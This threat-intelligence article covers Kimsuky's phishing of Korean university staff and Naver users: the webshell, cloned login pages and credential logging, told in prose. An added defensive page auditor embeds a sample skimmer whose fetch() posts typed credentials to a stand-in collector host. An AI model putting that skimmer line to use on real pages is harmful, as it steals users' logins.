Assault by North Korean Kimsuky Group on University Professors

Kimsuky, a North Korean APT group, has been identified running targeted phishing campaigns and abusing DMARC to conceal its social engineering. Its main goal is to infiltrate university networks and steal research data for the Reconnaissance General Bureau. This aligns with North Korea’s strategic objective of acquiring intelligence to enhance its scientific capabilities, a pattern seen in previous incidents involving the theft of nuclear, healthcare, and pharmaceutical research data.

The recent exposure of Kimsuky’s operational security vulnerabilities has shed light on their tactics and underscores the persistent threat posed by this cyber espionage group. It has come to light that Kimsuky uses compromised internet hosts like audko and dorray as staging grounds for their attacks. They deploy a webshell known as “Green Dinosaur,” derived from the Indrajith Mini Shell 2.0, on these compromised systems. This webshell, which is specifically designed for evasion, allows remote operators to upload, download, rename, and delete files, facilitating the creation of phishing websites.

Kimsuky has been observed creating phishing pages that mimic authentic university login portals, with a specific focus on Dongduk, Korea, and Yonsei universities. These pages are modified to capture login credentials, bypass encryption protocols, and redirect victims to a decoy PDF hosted on Google Drive. The PDF, disguised as an invitation to the Asan Institute for Policy Studies August Forum, serves as a social engineering tactic to build trust with victims.

The group uses a PHP script to log the username, password, and login attempts, enabling it to steal credentials from unsuspecting victims. By injecting malicious code into copies of the legitimate login pages that closely resemble the actual university portals, Kimsuky is able to capture sensitive information. The Korea University attack alters the page’s JavaScript to capture user input, while the Yonsei University attack modifies the HTML for the same purpose. Both attacks then forward the victim to the genuine login page after the credentials have been captured, so the theft is not immediately noticed.
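A defender-side integrity check for the kind of page tampering described above, written for this article as an added example (it is not code from the article or from the Resilience report). It parses a login page and flags any form action, script source, or URL inside an inline script that would send data to a host other than the portal’s own; the sample HTML and the hostnames in it are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class LoginPageAuditor(HTMLParser):
    """Collect form actions, external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.script_srcs, self.inline_scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script = True  # body arrives via handle_data (CDATA mode)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_scripts.append(data)


URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")


def _foreign(url, expected_host):
    """True if the URL has an absolute host outside expected_host or its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and host != expected_host and not host.endswith("." + expected_host)


def audit_login_page(html, expected_host):
    """Return (kind, host) findings for every credential path that leaves the portal."""
    p = LoginPageAuditor()
    p.feed(html)
    findings = [("form-action", urlparse(u).hostname) for u in p.form_actions if _foreign(u, expected_host)]
    findings += [("script-src", urlparse(u).hostname) for u in p.script_srcs if _foreign(u, expected_host)]
    for body in p.inline_scripts:
        findings += [("inline-script-url", urlparse(u).hostname) for u in URL_RE.findall(body) if _foreign(u, expected_host)]
    return findings


# Constructed sample: the form itself still posts to the portal, but an injected
# handler copies the typed credentials to a collector host first.
SAMPLE_HTML = """<form action="/login" method="post"><input name="user"><input name="pw" type="password"></form>
<script>document.forms[0].onsubmit = function () {
  fetch("https://collector.example.invalid/log.php", {method: "POST", body: new FormData(document.forms[0])});
};</script>"""
```

Running `audit_login_page(SAMPLE_HTML, "portal.example.invalid")` reports the collector host; the same check over a fetched copy of the real portal, or over a page a user reported, is a quick way to triage a suspected clone.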

In addition to targeting university accounts, Kimsuky uses a generic phishing toolkit against Naver accounts. This toolkit acts as a proxy similar to Evilginx, capturing cookies and credentials from users who fall victim to its deceptive tactics. Using a custom PHPMailer implementation called “SendMail” hosted on Green Dinosaur, the attackers compromised a Seoul National University professor’s email account to gain access to a South Korean SMTP server for Dooray CRM.

According to Resilience, Kimsuky targeted employees at Dongduk, Korea, and Yonsei Universities by exploiting accounts with identical credentials and recovery emails. The attackers used a SendMail server to distribute Naver-themed phishing emails through compromised Gmail and Daum accounts. These malicious emails, which falsely claim Naver account deletion or email restrictions, direct victims to multiple phishing websites.

The exposure of Kimsuky’s tactics highlights the ongoing threat posed by this North Korean cyber espionage group and emphasizes the need for enhanced cybersecurity measures to protect against such attacks. University networks and research institutions must remain vigilant and continually update their defenses to mitigate the risk of falling prey to sophisticated phishing campaigns orchestrated by groups like Kimsuky.
